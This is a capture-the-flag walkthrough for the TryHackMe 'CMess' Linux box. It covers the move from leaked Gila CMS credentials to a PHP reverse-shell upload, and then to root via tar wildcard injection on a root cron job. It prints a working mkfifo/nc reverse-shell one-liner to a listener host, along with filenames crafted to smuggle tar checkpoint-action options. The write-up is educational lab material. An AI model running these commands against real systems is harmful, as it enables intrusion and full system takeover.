V3NU5đź’€AL13N:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

CMess

OS = LINUX

DIFFICULTY = MEDIUM

nmap scan

image

we have 2 open ports

let’s start our enumeration from port 80

going over to the web page shows that it is running GILA cms

image

so, let’s add the domain “cmess.thm” to our /etc/hosts file

Then bruteforcing subdomains using ffuf gives this

image

which shows that there is subdomain “dev.cmess.thm”

Also add the subdomain to the /etc/hosts file too

let’s go over to the web we have some creds which you can see below image

so, let’s try the credential on the admin login page

image

wow it works and we can see the GILA CMS version

so, moving on to the content page on the dashboard for us to upload a reverse shell script in the file manager

image so we’re able to upload a php reverse shell

And set ur ncat listener then visit the assets directory to load the uploaded shell

image

it spawned us a shell on the target system

we have our sweet reverse shell. so, stabilize it image so, we can see our privilege is limited let’s try escalating privilege

Privilege escalation

Uploading linpeas on the box

we found a password back up file at the /opt dir

it contains the password for user “andre”

image

so sshing into the server using the username and password

we’re able to read the user flag now

image

Okay, so from this we know that there’s a backup service running on the server, we can also see this from the linpeas report, and we also found the backed up file in the /tmp folder earlier when we were looking for user priv-esc. We can in fact see the exact command that is being run when the backup happens . */2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz * There’s a way to exploit tar if it uses wildcards, there is more info on it in this article link .

The name of the attack is Wildcard injection, and it’s a way to make tar run an executable for us. Since the backup service is running as root, if we make this executable a reverse shell, then we got ourselves a root shell. set your netcat listener.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.3.145 1337 >/tmp/f" > shell.sh

2. echo ""> "--checkpoint-action=exec=sh shell.sh"

3. echo ""> --checkpoint=1

And we are root lol ;)

image

Thanks hope you had fun!

For any enquiries shoot me a dm on twitter @ link